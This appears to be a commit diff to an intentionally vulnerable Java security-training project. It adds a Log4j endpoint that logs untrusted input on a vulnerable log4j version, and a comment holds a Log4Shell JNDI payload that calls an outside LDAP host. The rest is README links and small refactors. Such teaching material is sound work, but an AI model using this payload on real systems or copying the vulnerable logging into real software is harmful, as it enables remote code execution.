add log4j

Author: JoyChou93

README.md

@@ -37,6 +37,7 @@ Sort by letter.
 - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Jsonp.java)
+- [Log4j](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Log4j.java)
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)

README_zh.md

@@ -32,6 +32,7 @@ joychou/joychou123
 - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java)
+- [Log4j](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Log4j.java)
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)

java-sec-code.iml

@@ -79,8 +79,8 @@
     <orderEntry type="library" name="Maven: commons-codec:commons-codec:1.10" level="project" />
     <orderEntry type="library" name="Maven: org.apache.httpcomponents:fluent-hc:4.3.6" level="project" />
     <orderEntry type="library" name="Maven: commons-logging:commons-logging:1.1.3" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.8.2" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.7" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.9.1" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.9.1" level="project" />
     <orderEntry type="library" name="Maven: com.squareup.okhttp:okhttp:2.5.0" level="project" />
     <orderEntry type="library" name="Maven: com.squareup.okio:okio:1.6.0" level="project" />
     <orderEntry type="library" name="Maven: org.apache.commons:commons-digester3:3.2" level="project" />

pom.xml

@@ -100,7 +100,13 @@
         <dependency>
             <groupId>org.apache.logging.log4j</groupId>
             <artifactId>log4j-core</artifactId>
-            <version>2.8.2</version>
+            <version>2.9.1</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.apache.logging.log4j</groupId>
+            <artifactId>log4j-api</artifactId>
+            <version>2.9.1</version>
         </dependency>
 
         <dependency>
@@ -129,6 +135,7 @@
             <artifactId>spring-boot-starter-actuator</artifactId>
         </dependency>
 
+        <!-- eureka -->
         <dependency>
             <groupId>org.springframework.cloud</groupId>
             <artifactId>spring-cloud-starter-netflix-eureka-client</artifactId>

src/main/java/org/joychou/controller/Log4j.java

@@ -0,0 +1,29 @@
+package org.joychou.controller;
+
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class Log4j {
+
+    private static final Logger logger = LogManager.getLogger("Log4j");
+
+    /**
+     * http://localhost:8080/log4j?token=${jndi:ldap://wffsr5.dnslog.cn:9999}
+     * Default: error/fatal/off
+     * Fix: Update log4j to lastet version.
+     * @param token token
+     */
+    @GetMapping("/log4j")
+    public String log4j(String token) {
+        if(token.equals("java-sec-code")) {
+            return "java sec code";
+        } else {
+            logger.error(token);
+            return "error";
+        }
+    }
+
+}

src/main/java/org/joychou/controller/SQLI.java

@@ -43,7 +43,7 @@ public class SQLI {
 
     /**
      * Vuln Code.
-     * http://localhost:8080/sqli/jdbc/vul?username=joychou
+     * http://localhost:8080/sqli/jdbc/vuln?username=joychou
      *
      * @param username username
      */

src/main/java/org/joychou/controller/SSRF.java

@@ -67,7 +67,7 @@ public String URLConnectionSec(String url) {
     public String httpURLConnection(@RequestParam String url) {
         try {
             SecurityUtil.startSSRFHook();
-            return HttpUtils.HTTPURLConnection(url);
+            return HttpUtils.HttpURLConnection(url);
         } catch (SSRFException | IOException e) {
             return e.getMessage();
         } finally {

src/main/java/org/joychou/filter/OriginFilter.java

@@ -7,6 +7,7 @@
 import javax.servlet.http.HttpServletResponse;
 import java.io.IOException;
 
+import org.apache.catalina.servlet4preview.http.HttpFilter;
 import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;

src/main/java/org/joychou/security/ssrf/SSRFChecker.java

@@ -147,8 +147,8 @@ static boolean isInternalIp(String strIP) {
     /**
      * host转换为IP
      * 会将各种进制的ip转为正常ip
-     * 167772161转换为10.0.0.1
-     * 127.0.0.1.xip.io转换为127.0.0.1
+     * 167772161 转换为  10.0.0.1
+     * 127.0.0.1.xip.io 转换为 127.0.0.1
      *
      * @param host 域名host
      */

src/main/java/org/joychou/util/HttpUtils.java

@@ -5,7 +5,6 @@
 import org.apache.commons.httpclient.methods.GetMethod;
 import org.apache.commons.io.IOUtils;
 import org.apache.http.HttpResponse;
-import org.apache.http.client.config.RequestConfig;
 import org.apache.http.client.fluent.Request;
 import org.apache.http.client.methods.HttpGet;
 import org.apache.http.impl.client.CloseableHttpClient;
@@ -21,6 +20,7 @@
 import javax.imageio.ImageIO;
 import java.io.BufferedReader;
 import java.io.IOException;
+import java.io.InputStream;
 import java.io.InputStreamReader;
 import java.net.HttpURLConnection;
 import java.net.URI;
@@ -33,7 +33,7 @@
  */
 public class HttpUtils {
 
-    private static Logger logger = LoggerFactory.getLogger(HttpUtils.class);
+    private final static Logger logger = LoggerFactory.getLogger(HttpUtils.class);
 
     public static String commonHttpClient(String url) {
 
@@ -110,12 +110,14 @@ public static String URLConnection(String url) {
     }
 
 
-    public static String HTTPURLConnection(String url) {
+    public static String HttpURLConnection(String url) {
         try {
             URL u = new URL(url);
             URLConnection urlConnection = u.openConnection();
-            HttpURLConnection httpUrl = (HttpURLConnection) urlConnection;
-            BufferedReader in = new BufferedReader(new InputStreamReader(httpUrl.getInputStream())); //send request
+            HttpURLConnection conn = (HttpURLConnection) urlConnection;
+            // Many HttpURLConnection methods can send http request, such as getResponseCode, getHeaderField
+            InputStream is = conn.getInputStream();  // send request
+            BufferedReader in = new BufferedReader(new InputStreamReader(is));
             String inputLine;
             StringBuilder html = new StringBuilder();
 
@@ -206,7 +208,6 @@ public static String HttpAsyncClients(String url) {
                 logger.error(e.getMessage());
             }
         }
-
     }
 
 }